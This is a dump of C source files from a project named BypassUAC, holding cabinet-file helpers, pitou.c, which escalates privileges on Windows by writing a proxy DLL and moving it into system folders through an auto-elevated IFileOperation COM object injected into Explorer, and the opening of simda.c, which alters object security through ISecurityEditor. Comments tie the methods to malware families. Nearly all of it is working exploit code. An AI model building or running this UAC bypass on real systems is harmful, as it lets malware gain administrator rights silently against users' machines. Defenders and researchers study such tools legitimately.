172 | 	LPSTR pszFile,
173 | 	int FAR *err,
174 | 	void FAR *pv
175 | 	)
176 | {
177 | 	INT iResult = 0;
178 | 
179 | 	UNREFERENCED_PARAMETER(pv);
180 | 
181 | 	if (DeleteFileA(pszFile) == FALSE) {
182 | 		if (err) {
183 | 			*err = GetLastError();
184 | 		}
185 | 		iResult = -1;
186 | 	}
187 | 	return iResult;
188 | }
189 | 
190 | long DIAMONDAPI fnFCISTATUS(
191 | 	UINT typeStatus,
192 | 	ULONG cb1,
193 | 	ULONG cb2,
194 | 	void FAR *pv
195 | 	)
196 | {
197 | 	UNREFERENCED_PARAMETER(typeStatus);
198 | 	UNREFERENCED_PARAMETER(cb1);
199 | 	UNREFERENCED_PARAMETER(cb2);
200 | 	UNREFERENCED_PARAMETER(pv);
201 | 
202 | 	return 0; //not implemented
203 | }
204 | 
205 | int DIAMONDAPI fnFCIFILEPLACED(
206 | 	PCCAB pccab,
207 | 	LPSTR pszFile,
208 | 	long cbFile,
209 | 	BOOL fContinuation,
210 | 	void FAR *pv
211 | 	)
212 | {
213 | 	UNREFERENCED_PARAMETER(pccab);
214 | 	UNREFERENCED_PARAMETER(pszFile);
215 | 	UNREFERENCED_PARAMETER(cbFile);
216 | 	UNREFERENCED_PARAMETER(fContinuation);
217 | 	UNREFERENCED_PARAMETER(pv);
218 | 
219 | 	return 0; //not implemented
220 | }
221 | 
222 | INT_PTR DIAMONDAPI fnFCIGETOPENINFO(
223 | 	LPSTR pszName,
224 | 	USHORT *pdate,
225 | 	USHORT *ptime,
226 | 	USHORT *pattribs,
227 | 	int FAR *err,
228 | 	void FAR *pv
229 | 	)
230 | {
231 | 	HANDLE hFile;
232 | 	FILETIME fileTime;
233 | 	BY_HANDLE_FILE_INFORMATION fileInfo;
234 | 
235 | 	hFile = (HANDLE)fnFCIOPEN(pszName, _O_RDONLY, 0, err, pv);
236 | 
237 | 	if (hFile != INVALID_HANDLE_VALUE)
238 | 	{
239 | 		if (GetFileInformationByHandle(hFile, &fileInfo)
240 | 			&& FileTimeToLocalFileTime(&fileInfo.ftCreationTime, &fileTime)
241 | 			&& FileTimeToDosDateTime(&fileTime, pdate, ptime))
242 | 		{
243 | 			*pattribs = (USHORT)fileInfo.dwFileAttributes;			
244 | 			*pattribs &= (
245 | 				FILE_ATTRIBUTE_READONLY | 
246 | 				FILE_ATTRIBUTE_HIDDEN	| 
247 | 				FILE_ATTRIBUTE_SYSTEM	| 
248 | 				FILE_ATTRIBUTE_ARCHIVE
249 | 				);
250 | 		}
251 | 		else
252 | 		{
253 | 			fnFCICLOSE((INT_PTR)hFile, err, pv);
254 | 			hFile = INVALID_HANDLE_VALUE;
255 | 		}
256 | 	}
257 | 
258 | 	return (INT_PTR)hFile;
259 | }
260 | 
261 | BOOL DIAMONDAPI fnFCIGETTEMPFILE(
262 | 	char *pszTempName,
263 | 	int cbTempName,
264 | 	void FAR *pv
265 | 	)
266 | {
267 | 	BOOL bSucceeded = FALSE;
268 | 	SIZE_T cch;
269 | 	CHAR szTempPath[MAX_PATH];
270 | 	CHAR szTempFile[MAX_PATH];
271 | 
272 | 	UNREFERENCED_PARAMETER(pv);
273 | 
274 | 	if (GetTempPathA(MAX_PATH, szTempPath) != 0) {			
275 | 		if (GetTempFileNameA(szTempPath, "emcau", 0, szTempFile) != 0) {
276 | 			DeleteFileA(szTempPath);
277 | 			cch = cbTempName / sizeof(CHAR);
278 | 			_strncpy_a(pszTempName, cch, szTempFile, _strlen_a(szTempFile));
279 | 			bSucceeded = TRUE;
280 | 		}
281 | 	}
282 | 
283 | 	return bSucceeded;
284 | }
285 | 
286 | BOOL DIAMONDAPI fnFCIGETNEXTCABINET(
287 | 	PCCAB  pccab,
288 | 	ULONG  cbPrevCab,
289 | 	void FAR *pv
290 | 	)
291 | {
292 | 	UNREFERENCED_PARAMETER(pccab);
293 | 	UNREFERENCED_PARAMETER(cbPrevCab);
294 | 	UNREFERENCED_PARAMETER(pv);
295 | 
296 | 	return FALSE;
297 | }
298 | 
299 | /*
300 | ** CAB Callbacks END
301 | */
302 | 
303 | /*
304 | * cabCreate
305 | *
306 | * Purpose:
307 | *
308 | * Initialize cabinet class object.
309 | *
310 | */
311 | CABDATA *cabCreate(
312 | 	_In_ LPWSTR lpszCabName
313 | 	)
314 | {
315 | 	PCABDATA pCabinet;
316 | 	CHAR szCab[CB_MAX_CABINET_NAME];
317 | 
318 | 	if (lpszCabName == NULL) {
319 | 		return NULL;
320 | 	}
321 | 
322 | 	RtlSecureZeroMemory(szCab, sizeof(szCab));
323 | 	if (WideCharToMultiByte(CP_ACP, 0, lpszCabName, -1, szCab, CB_MAX_CABINET_NAME - 2, 0, NULL) == 0) {
324 | 		return NULL;
325 | 	}
326 | 
327 | 	pCabinet = (PCABDATA)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(CABDATA));
328 | 	if (pCabinet == NULL) {
329 | 		return NULL;
330 | 	}
331 | 
332 | 	_strcpy_a(pCabinet->cab.szCab, szCab); //Full name with path or only name (current folder then).
333 | 
334 | 	pCabinet->cab.cb = 0x7FFFFFFF; //Maximum cabinet size in bytes.
335 | 
336 | 	pCabinet->hfci = FCICreate(
337 | 		&pCabinet->erf,
338 | 		fnFCIFILEPLACED,
339 | 		fnFCIALLOC,
340 | 		fnFCIFREE,
341 | 		fnFCIOPEN,
342 | 		fnFCIREAD,
343 | 		fnFCIWRITE,
344 | 		fnFCICLOSE,
345 | 		fnFCISEEK,
346 | 		fnFCIDELETE,
347 | 		fnFCIGETTEMPFILE,
348 | 		&pCabinet->cab,
349 | 		NULL);
350 | 
351 | 	if (pCabinet->hfci == NULL) {
352 | 		HeapFree(GetProcessHeap(), 0, pCabinet);
353 | 		pCabinet = NULL;
354 | 	}
355 | 	return pCabinet;
356 | }
357 | 
358 | /*
359 | * cabAddFile
360 | *
361 | * Purpose:
362 | *
363 | * Insert given file to the previously initialized cabinet object.
364 | *
365 | */
366 | BOOL cabAddFile(
367 | 	_In_ CABDATA *Cabinet,
368 | 	_In_ LPWSTR lpszFileName,
369 | 	_In_ LPWSTR lpszInternalName
370 | 	)
371 | {
372 | 	BOOL bResult = FALSE, cond = FALSE;
373 | 	CHAR szFileName[CB_MAX_FILENAME];
374 | 	CHAR szInternalName[CB_MAX_FILENAME];
375 | 	
376 | 	do {
377 | 
378 | 		if (Cabinet == NULL) {
379 | 			break;
380 | 		}
381 | 
382 | 		//convert filename to ansi
383 | 		RtlSecureZeroMemory(szFileName, sizeof(szFileName));
384 | 		if (WideCharToMultiByte(CP_ACP, 0, lpszFileName, -1, szFileName, CB_MAX_FILENAME - 2, 0, NULL) == 0) {
385 | 			break;
386 | 		}
387 | 		//convert internal name to ansi
388 | 		RtlSecureZeroMemory(szInternalName, sizeof(szInternalName));
389 | 		if (WideCharToMultiByte(CP_ACP, 0, lpszInternalName, -1, szInternalName, CB_MAX_FILENAME - 2, 0, NULL) == 0) {
390 | 			break;
391 | 		}
392 | 
393 | 		bResult = FCIAddFile(Cabinet->hfci, (char*)szFileName, (char*)szInternalName, FALSE,
394 | 			fnFCIGETNEXTCABINET, fnFCISTATUS, fnFCIGETOPENINFO, tcompTYPE_NONE /*tcompTYPE_MSZIP*/);
395 | 
396 | 	} while (cond);
397 | 
398 | 	return bResult;
399 | }
400 | 
401 | /*
402 | * cabClose
403 | *
404 | * Purpose:
405 | *
406 | * Flush file and destroy cabinet class.
407 | *
408 | */
409 | VOID cabClose(
410 | 	_In_ CABDATA *Cabinet
411 | 	)
412 | {
413 | 	if (Cabinet == NULL) {
414 | 		return;
415 | 	}
416 | 
417 | 	FCIFlushCabinet(
418 | 		Cabinet->hfci,
419 | 		FALSE,
420 | 		fnFCIGETNEXTCABINET,
421 | 		fnFCISTATUS
422 | 		);
423 | 
424 | 	FCIDestroy(Cabinet->hfci);
425 | 	HeapFree(GetProcessHeap(), 0, Cabinet);
426 | }
427 | 


--------------------------------------------------------------------------------
/BypassUAC/makecab.h:
--------------------------------------------------------------------------------
 1 | /*******************************************************************************
 2 | *
 3 | *  (C) COPYRIGHT AUTHORS, 2015 - 2016
 4 | *
 5 | *  TITLE:       MAKECAB.H
 6 | *
 7 | *  VERSION:     2.00
 8 | *
 9 | *  DATE:        12 Nov 2015
10 | *
11 | *  Prototypes and definitions for makecab module.
12 | *
13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
16 | * PARTICULAR PURPOSE.
17 | *
18 | *******************************************************************************/
19 | #pragma once
20 | 
21 | #include <fci.h>
22 | #include <fcntl.h>
23 | 
24 | typedef struct _CABDATA {
25 | 	ERF erf;
26 | 	CCAB cab;
27 | 	HFCI hfci;
28 | } CABDATA, *PCABDATA;
29 | 
30 | CABDATA *cabCreate(
31 | 	_In_ LPWSTR lpszCabName
32 | 	);
33 | 
34 | BOOL cabAddFile(
35 | 	_In_ CABDATA *Cabinet,
36 | 	_In_ LPWSTR lpszFileName,
37 | 	_In_ LPWSTR lpszInternalName
38 | 	);
39 | 
40 | VOID cabClose(
41 | 	_In_ CABDATA *Cabinet
42 | 	);
43 | 
44 | 


--------------------------------------------------------------------------------
/BypassUAC/pitou.c:
--------------------------------------------------------------------------------
  1 | /*******************************************************************************
  2 | *
  3 | *  (C) COPYRIGHT AUTHORS, 2014 - 2015
  4 | *
  5 | *  TITLE:       PITOU.C
  6 | *
  7 | *  VERSION:     2.00
  8 | *
  9 | *  DATE:        16 Nov 2015
 10 | *
 11 | *  Leo Davidson work based AutoElevation and Pitou new variant.
 12 | *
 13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
 14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
 15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
 16 | * PARTICULAR PURPOSE.
 17 | *
 18 | *******************************************************************************/
 19 | #include "global.h"
 20 | #include <shlobj.h>
 21 | 
 22 | ELOAD_PARAMETERS g_ElevParams;
 23 | ELOAD_PARAMETERS_3 g_ElevParams3;
 24 | 
 25 | /*
 26 | * ucmElevatedLoadProc
 27 | *
 28 | * Purpose:
 29 | *
 30 | * Bypass UAC using AutoElevated IFileOperation.
 31 | * Refactored Leo Davidson concept.
 32 | *
 33 | */
 34 | DWORD WINAPI ucmElevatedLoadProc(
 35 | 	PELOAD_PARAMETERS elvpar
 36 | 	)
 37 | {
 38 | 	HRESULT				r;
 39 | 	BOOL				cond = FALSE;
 40 | 	IFileOperation      *FileOperation1 = NULL;
 41 | 	IShellItem			*isrc = NULL, *idst = NULL;
 42 | 	BIND_OPTS3			bop;
 43 | 	SHELLEXECUTEINFOW   shexec;
 44 | 	WCHAR				textbuf[MAX_PATH * 2], *p, *f, *f0;
 45 | 
 46 | 	if (elvpar == NULL)
 47 | 		return (DWORD)E_FAIL;
 48 | 
 49 | 	r = elvpar->xCoInitialize(NULL);
 50 | 	if (r != S_OK)
 51 | 		return r;
 52 | 
 53 | 	RtlSecureZeroMemory(&bop, sizeof(bop));
 54 | 	RtlSecureZeroMemory(&shexec, sizeof(shexec));
 55 | 
 56 | 	do {
 57 | 		r = elvpar->xCoCreateInstance(&elvpar->xCLSID, NULL,
 58 | 			CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_HANDLER, &elvpar->xIID, &FileOperation1);
 59 | 
 60 | 		if (r != S_OK) {
 61 | 			break;
 62 | 		}
 63 | 
 64 | 		if (FileOperation1 != NULL) {
 65 | 			FileOperation1->lpVtbl->Release(FileOperation1);
 66 | 		}
 67 | 
 68 | 		bop.cbStruct = sizeof(bop);
 69 | 		bop.dwClassContext = CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_HANDLER;
 70 | 		r = elvpar->xCoGetObject(elvpar->EleMoniker, (BIND_OPTS *)&bop, &elvpar->xIID, &FileOperation1);
 71 | 		if (r != S_OK) {
 72 | 			break;
 73 | 		}
 74 | 		if (FileOperation1 == NULL) {
 75 | 			r = E_FAIL;
 76 | 			break;
 77 | 		}
 78 | 
 79 | 		FileOperation1->lpVtbl->SetOperationFlags(FileOperation1,
 80 | 			FOF_NOCONFIRMATION | FOF_SILENT | FOFX_SHOWELEVATIONPROMPT | FOFX_NOCOPYHOOKS | FOFX_REQUIREELEVATION);
 81 | 
 82 | 		r = elvpar->xSHCreateItemFromParsingName(elvpar->SourceFilePathAndName,
 83 | 			NULL, &elvpar->xIID_IShellItem, &isrc);
 84 | 
 85 | 		if (r != S_OK) {
 86 | 			break;
 87 | 		}
 88 | 		r = elvpar->xSHCreateItemFromParsingName(elvpar->DestinationDir, NULL, &elvpar->xIID_IShellItem, &idst);
 89 | 		if (r != S_OK) {
 90 | 			break;
 91 | 		}
 92 | 
 93 | 		r = FileOperation1->lpVtbl->MoveItem(FileOperation1, isrc, idst, NULL, NULL);
 94 | 		if (r != S_OK) {
 95 | 			break;
 96 | 		}
 97 | 		r = FileOperation1->lpVtbl->PerformOperations(FileOperation1);
 98 | 		if (r != S_OK) {
 99 | 			break;
100 | 		}
101 | 
102 | 		idst->lpVtbl->Release(idst);
103 | 		idst = NULL;
104 | 		isrc->lpVtbl->Release(isrc);
105 | 		isrc = NULL;
106 | 
107 | 		shexec.cbSize = sizeof(shexec);
108 | 		shexec.fMask = SEE_MASK_NOCLOSEPROCESS;
109 | 		shexec.nShow = SW_SHOW;
110 | 		shexec.lpFile = elvpar->ExePathAndName;
111 | 		shexec.lpParameters = NULL;
112 | 		shexec.lpDirectory = elvpar->DestinationDir;
113 | 		if (elvpar->xShellExecuteExW(&shexec))
114 | 			if (shexec.hProcess != NULL) {
115 | 				elvpar->xWaitForSingleObject(shexec.hProcess, INFINITE);
116 | 				elvpar->xCloseHandle(shexec.hProcess);
117 | 			}
118 | 
119 | 		f0 = textbuf;
120 | 		p = (WCHAR *)elvpar->DestinationDir;
121 | 		while (*p != (WCHAR)0) {
122 | 			*f0 = *p;
123 | 			f0++;
124 | 			p++;
125 | 		}
126 | 		*f0 = 0;
127 | 
128 | 		f = (WCHAR *)elvpar->SourceFilePathAndName;
129 | 		p = f;
130 | 		while (*f != (WCHAR)0) {
131 | 			if (*f == (WCHAR)'\\')
132 | 				p = (WCHAR *)f + 1;
133 | 			f++;
134 | 		}
135 | 
136 | 		while (*p != (WCHAR)0) {
137 | 			*f0 = *p;
138 | 			f0++;
139 | 			p++;
140 | 		}
141 | 		*f0 = 0;
142 | 
143 | 		r = elvpar->xSHCreateItemFromParsingName(textbuf, NULL, &elvpar->xIID_IShellItem, &idst);
144 | 		if (r != S_OK) {
145 | 			break;
146 | 		}
147 | 
148 | 		r = FileOperation1->lpVtbl->DeleteItem(FileOperation1, idst, NULL);
149 | 		if (r != S_OK) {
150 | 			break;
151 | 		}
152 | 		FileOperation1->lpVtbl->PerformOperations(FileOperation1);
153 | 
154 | 	} while (cond);
155 | 
156 | 	if (FileOperation1 != NULL) {
157 | 		FileOperation1->lpVtbl->Release(FileOperation1);
158 | 	}
159 | 	if (isrc != NULL) {
160 | 		isrc->lpVtbl->Release(isrc);
161 | 	}
162 | 	if (idst != NULL) {
163 | 		idst->lpVtbl->Release(idst);
164 | 	}
165 | 
166 | 	elvpar->xCoUninitialize();
167 | 	return r;
168 | }
169 | 
170 | /*
171 | * ucmCreateCallParameters
172 | *
173 | * Purpose:
174 | *
175 | * Fill common part of call parameters.
176 | *
177 | */
178 | BOOL ucmCreateCallParameters(
179 | 	PVOID Parameters
180 | 	)
181 | {
182 | 	BOOL bCond = FALSE, bResult = FALSE;
183 | 	PELOAD_PARAMETERS elvpar = (PELOAD_PARAMETERS)Parameters;
184 | 	
185 | 	do {
186 | 
187 | 		if (Parameters == NULL) {
188 | 			break;
189 | 		}
190 | 
191 | 		//elevation moniker
192 | 		_strcpy_w(elvpar->EleMoniker, IFILEOP_ELEMONIKER);
193 | 
194 | 		elvpar->xIID = IID_IFileOperation;
195 | 		elvpar->xIID_IShellItem = IID_IShellItem;
196 | 		elvpar->xCLSID = CLSID_FileOperation;
197 | 
198 | 		elvpar->xCoInitialize = (pfnCoInitialize)GetProcAddress(g_ctx.hOle32, "CoInitialize");
199 | 		elvpar->xCoCreateInstance = (pfnCoCreateInstance)GetProcAddress(g_ctx.hOle32, "CoCreateInstance");
200 | 		elvpar->xCoGetObject = (pfnCoGetObject)GetProcAddress(g_ctx.hOle32, "CoGetObject");
201 | 		elvpar->xCoUninitialize = (pfnCoUninitialize)GetProcAddress(g_ctx.hOle32, "CoUninitialize");
202 | 		elvpar->xSHCreateItemFromParsingName = (pfnSHCreateItemFromParsingName)GetProcAddress(g_ctx.hShell32, "SHCreateItemFromParsingName");
203 | 		elvpar->xShellExecuteExW = (pfnShellExecuteExW)GetProcAddress(g_ctx.hShell32, "ShellExecuteExW");
204 | 		elvpar->xWaitForSingleObject = (pfnWaitForSingleObject)GetProcAddress(g_ctx.hKernel32, "WaitForSingleObject");
205 | 		elvpar->xCloseHandle = (pfnCloseHandle)GetProcAddress(g_ctx.hKernel32, "CloseHandle");
206 | 		elvpar->xOutputDebugStringW = (pfnOutputDebugStringW)GetProcAddress(g_ctx.hKernel32, "OutputDebugStringW");
207 | 
208 | 		bResult = TRUE;
209 | 
210 | 	} while (bCond);
211 | 
212 | 	return bResult;
213 | }
214 | 
215 | /*
216 | * ucmStandardAutoElevation
217 | *
218 | * Purpose:
219 | *
220 | * Leo Davidson AutoElevation method with derivatives.
221 | *
222 | * M1W7   - Original Leo Davidson concept.
223 | * M1W8   - Windows 8.1 adapted M1W7 (bypassing sysprep embedded manifest dlls redirection).
224 | * M1W7T  - Leo Davidson concept with different target dll, used by Win32/Tilon.
225 | * M1W10  - Windows 10 adapted M1W7.
226 | * M1WALL - WinNT/Pitou derivative from Leo Davidson concept.
227 | *
228 | */
229 | BOOL ucmStandardAutoElevation(
230 | 	UACBYPASSMETHOD Method,
231 | 	CONST PVOID ProxyDll,
232 | 	DWORD ProxyDllSize
233 | 	)
234 | {
235 | 	BOOL		cond = FALSE, bResult = FALSE;
236 | 	LPWSTR		lpSourceDll, lpTargetDir, lpTargetProcess;
237 | 	WCHAR		szBuffer[MAX_PATH + 1];
238 | 
239 | 	switch (Method) {
240 | 
241 | 	case UacMethodSysprep1:
242 | 		lpSourceDll = M1W7_SOURCEDLL;
243 | 		lpTargetDir = M1W7_TARGETDIR;
244 | 		lpTargetProcess = M1W7_TARGETPROCESS;
245 | 		break;
246 | 
247 | 	case UacMethodSysprep2:
248 | 		lpSourceDll = M1W8_SOURCEDLL;
249 | 		lpTargetDir = M1W7_TARGETDIR;
250 | 		lpTargetProcess = M1W7_TARGETPROCESS;
251 | 		break;
252 | 
253 | 	case UacMethodSysprep3:
254 | 		lpSourceDll = M1W10_SOURCEDLL;
255 | 		lpTargetDir = M1W7_TARGETDIR;
256 | 		lpTargetProcess = M1W7_TARGETPROCESS;
257 | 		break;
258 | 
259 | 	case UacMethodOobe:
260 | 		lpSourceDll = M1WALL_SOURCEDLL;
261 | 		lpTargetDir = M1WALL_TARGETDIR;
262 | 		lpTargetProcess = M1WALL_TARGETPROCESS;
263 | 		break;
264 | 
265 | 	case UacMethodTilon:
266 | 		lpSourceDll = M1W7T_SOURCEDLL;
267 | 		lpTargetDir = M1W7_TARGETDIR;
268 | 		lpTargetProcess = M1W7_TARGETPROCESS;
269 | 		break;
270 | 
271 | 	default:
272 | 		return FALSE;
273 | 	}
274 | 
275 | 	do {
276 | 
277 | 		//setup call parameters
278 | 		RtlSecureZeroMemory(&g_ElevParams, sizeof(g_ElevParams));
279 | 		if (!ucmCreateCallParameters(&g_ElevParams)) {
280 | 			break;
281 | 		}
282 | 
283 | 		//source filename
284 | 		if (ExpandEnvironmentStringsW(lpSourceDll,
285 | 			g_ElevParams.SourceFilePathAndName, MAX_PATH) == 0)
286 | 		{
287 | 			break;
288 | 		}
289 | 
290 | 		if (!supWriteBufferToFile(g_ElevParams.SourceFilePathAndName, 
291 | 			ProxyDll, ProxyDllSize))
292 | 		{
293 | 			break;
294 | 		}
295 | 
296 | 		//dest directory
297 | 		RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
298 | 		_strcpy_w(szBuffer, lpTargetDir);
299 | 		
300 | 		if (ExpandEnvironmentStringsW(szBuffer, 
301 | 			g_ElevParams.DestinationDir, MAX_PATH) == 0) 
302 | 		{
303 | 			break;
304 | 		}
305 | 		
306 | 		//target
307 | 		RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
308 | 		_strcpy_w(szBuffer, lpTargetProcess);
309 | 		
310 | 		if (ExpandEnvironmentStringsW(szBuffer, 
311 | 			g_ElevParams.ExePathAndName, MAX_PATH) == 0) 
312 | 		{
313 | 			break;
314 | 		}
315 | 
316 | 		bResult = ucmInjectExplorer(&g_ElevParams, ucmElevatedLoadProc);
317 | 
318 | 	} while (cond);
319 | 
320 | 	return bResult;
321 | }
322 | 
323 | /*
324 | * ucmElevatedLoadProcEx
325 | *
326 | * Purpose:
327 | *
328 | * Bypass UAC using AutoElevated IFileOperation.
329 | * Special version.
330 | *
331 | */
332 | DWORD WINAPI ucmElevatedLoadProcEx(
333 | 	PELOAD_PARAMETERS_3 elvpar
334 | 	)
335 | {
336 | 	HRESULT				r;
337 | 	BOOL				cond = FALSE;
338 | 	IFileOperation      *FileOperation1 = NULL;
339 | 	IShellItem			*isrc = NULL, *idst = NULL;
340 | 	BIND_OPTS3			bop;
341 | 	SHELLEXECUTEINFOW   shexec;
342 | 
343 | 	if (elvpar == NULL)
344 | 		return (DWORD)E_FAIL;
345 | 
346 | 	r = elvpar->xCoInitialize(NULL);
347 | 	if (r != S_OK)
348 | 		return r;
349 | 
350 | 	RtlSecureZeroMemory(&bop, sizeof(bop));
351 | 	RtlSecureZeroMemory(&shexec, sizeof(shexec));
352 | 
353 | 	do {
354 | 		r = elvpar->xCoCreateInstance(&elvpar->xCLSID, NULL,
355 | 			CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_HANDLER, &elvpar->xIID, &FileOperation1);
356 | 
357 | 		if (r != S_OK) {
358 | 			break;
359 | 		}
360 | 
361 | 		if (FileOperation1 != NULL) {
362 | 			FileOperation1->lpVtbl->Release(FileOperation1);
363 | 		}
364 | 
365 | 		bop.cbStruct = sizeof(bop);
366 | 		bop.dwClassContext = CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_HANDLER;
367 | 		r = elvpar->xCoGetObject(elvpar->EleMoniker, (BIND_OPTS *)&bop, &elvpar->xIID, &FileOperation1);
368 | 		if (r != S_OK) {
369 | 			break;
370 | 		}
371 | 		if (FileOperation1 == NULL) {
372 | 			r = E_FAIL;
373 | 			break;
374 | 		}
375 | 
376 | 		FileOperation1->lpVtbl->SetOperationFlags(FileOperation1,
377 | 			FOF_NOCONFIRMATION | FOF_SILENT | FOFX_SHOWELEVATIONPROMPT | FOFX_NOCOPYHOOKS | FOFX_REQUIREELEVATION);
378 | 
379 | 		r = elvpar->xSHCreateItemFromParsingName(elvpar->SourceFilePathAndName,
380 | 			NULL, &elvpar->xIID_IShellItem, &isrc);
381 | 
382 | 		if (r != S_OK) {
383 | 			break;
384 | 		}
385 | 		r = elvpar->xSHCreateItemFromParsingName(elvpar->DestinationDir, NULL, &elvpar->xIID_IShellItem, &idst);
386 | 		if (r != S_OK) {
387 | 			break;
388 | 		}
389 | 
390 | 		r = FileOperation1->lpVtbl->MoveItem(FileOperation1, isrc, idst, NULL, NULL);
391 | 		if (r != S_OK) {
392 | 			break;
393 | 		}
394 | 		r = FileOperation1->lpVtbl->PerformOperations(FileOperation1);
395 | 		if (r != S_OK) {
396 | 			break;
397 | 		}
398 | 
399 | 		idst->lpVtbl->Release(idst);
400 | 		idst = NULL;
401 | 		isrc->lpVtbl->Release(isrc);
402 | 		isrc = NULL;
403 | 
404 | 	} while (cond);
405 | 
406 | 	if (FileOperation1 != NULL) {
407 | 		FileOperation1->lpVtbl->Release(FileOperation1);
408 | 	}
409 | 	if (isrc != NULL) {
410 | 		isrc->lpVtbl->Release(isrc);
411 | 	}
412 | 	if (idst != NULL) {
413 | 		idst->lpVtbl->Release(idst);
414 | 	}
415 | 
416 | 	elvpar->xCoUninitialize();
417 | 	return r;
418 | }
419 | 
420 | /*
421 | * ucmAutoElevateCopyFile
422 | *
423 | * Purpose:
424 | *
425 | * Copy file autoelevated.
426 | *
427 | */
428 | BOOL ucmAutoElevateCopyFile(
429 | 	LPWSTR SourceFileName,
430 | 	LPWSTR DestinationDir
431 | 	)
432 | {
433 | 	BOOL		cond = FALSE, bResult = FALSE;
434 | 	WCHAR		szBuffer[MAX_PATH + 1];
435 | 
436 | 	do {
437 | 		if (
438 | 			(SourceFileName == NULL) ||
439 | 			(DestinationDir == NULL)
440 | 			)
441 | 		{
442 | 			break;
443 | 		}
444 | 
445 | 		RtlSecureZeroMemory(&g_ElevParams3, sizeof(g_ElevParams3));
446 | 
447 | 		//setup call parameters
448 | 		if (!ucmCreateCallParameters(&g_ElevParams3)) {
449 | 			break;
450 | 		}
451 | 
452 | 		//dest directory
453 | 		RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
454 | 		_strcpy_w(g_ElevParams3.DestinationDir, DestinationDir);
455 | 		_strcpy_w(g_ElevParams3.SourceFilePathAndName, SourceFileName);
456 | 		bResult = ucmInjectExplorer(&g_ElevParams3, ucmElevatedLoadProcEx);
457 | 
458 | 	} while (cond);
459 | 
460 | 	return bResult;
461 | }
462 | 


--------------------------------------------------------------------------------
/BypassUAC/pitou.h:
--------------------------------------------------------------------------------
 1 | /*******************************************************************************
 2 | *
 3 | *  (C) COPYRIGHT AUTHORS, 2014 - 2016
 4 | *
 5 | *  TITLE:       PITOU.H
 6 | *
 7 | *  VERSION:     2.00
 8 | *
 9 | *  DATE:        16 Nov 2015
10 | *
11 | *  Prototypes and definitions for Leo Davidson method.
12 | *
13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
16 | * PARTICULAR PURPOSE.
17 | *
18 | *******************************************************************************/
19 | #pragma once
20 | 
21 | BOOL ucmStandardAutoElevation(
22 | 	UACBYPASSMETHOD Method,
23 | 	CONST PVOID ProxyDll,
24 | 	DWORD ProxyDllSize
25 | 	);
26 | 
27 | BOOL ucmAutoElevateCopyFile(
28 | 	LPWSTR SourceFileName,
29 | 	LPWSTR DestinationDir
30 | 	);
31 | 


--------------------------------------------------------------------------------
/BypassUAC/simda.c:
--------------------------------------------------------------------------------
  1 | /*******************************************************************************
  2 | *
  3 | *  (C) COPYRIGHT AUTHORS, 2015 - 2016
  4 | *
  5 | *  TITLE:       SIMDA.C
  6 | *
  7 | *  VERSION:     2.00
  8 | *
  9 | *  DATE:        16 Nov 2015
 10 | *
 11 | *  Simda based UAC bypass using ISecurityEditor.
 12 | *
 13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
 14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
 15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
 16 | * PARTICULAR PURPOSE.
 17 | *
 18 | *******************************************************************************/
 19 | 
 20 | #include "global.h"
 21 | 
 22 | ELOAD_PARAMETERS_2 g_ElevParams2;
 23 | 
 24 | /*
 25 | * ucmElevatedAlterSecurityProc
 26 | *
 27 | * Purpose:
 28 | *
 29 | * Change object security through ISecurityEditor(SetNamedInfo).
 30 | *
 31 | */
 32 | DWORD WINAPI ucmElevatedAlterSecurityProc(
 33 | 	PELOAD_PARAMETERS_2 elvpar
 34 | 	)
 35 | {
 36 | 	HRESULT				r;
 37 | 	BOOL				cond = FALSE;
 38 | 	ISecurityEditor		*SecurityEditor1 = NULL;
 39 | 	BIND_OPTS3			bop;
 40 | 	LPOLESTR			pps;
 41 | 
 42 | 	if (elvpar == NULL) {
 43 | 		return (DWORD)E_FAIL;
 44 | 	}
 45 | 
 46 | 	r = elvpar->xCoInitialize(NULL);
 47 | 	if (r != S_OK) {
 48 | 		return r;
 49 | 	}
 50 | 
 51 | 	RtlSecureZeroMemory(&bop, sizeof(bop));
 52 | 
 53 | 	do {
 54 | 		r = elvpar->xCoCreateInstance(&elvpar->xCLSID_ShellSecurityEditor, NULL,
 55 | 			CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_HANDLER,
 56 | 			&elvpar->xIID_ISecurityEditor, &SecurityEditor1);
 57 | 
 58 | 		if (r != S_OK) {
 59 | 			break;
 60 | 		}
 61 | 
 62 | 		if (SecurityEditor1 != NULL) {
 63 | 			SecurityEditor1->lpVtbl->Release(SecurityEditor1);
 64 | 		}
 65 | 
 66 | 		bop.cbStruct = sizeof(bop);
 67 | 		bop.dwClassContext = CLSCTX_LOCAL_SERVER;
 68 | 
 69 | 		r = elvpar->xCoGetObject(elvpar->EleMoniker, (BIND_OPTS *)&bop, 
 70 | 			&elvpar->xIID_ISecurityEditor, &SecurityEditor1);
 71 | 
 72 | 		if (r != S_OK)
 73 | 			break;
 74 | 		if (SecurityEditor1 == NULL) {
 75 | 			r = E_FAIL;
 76 | 			break;
 77 | 		}
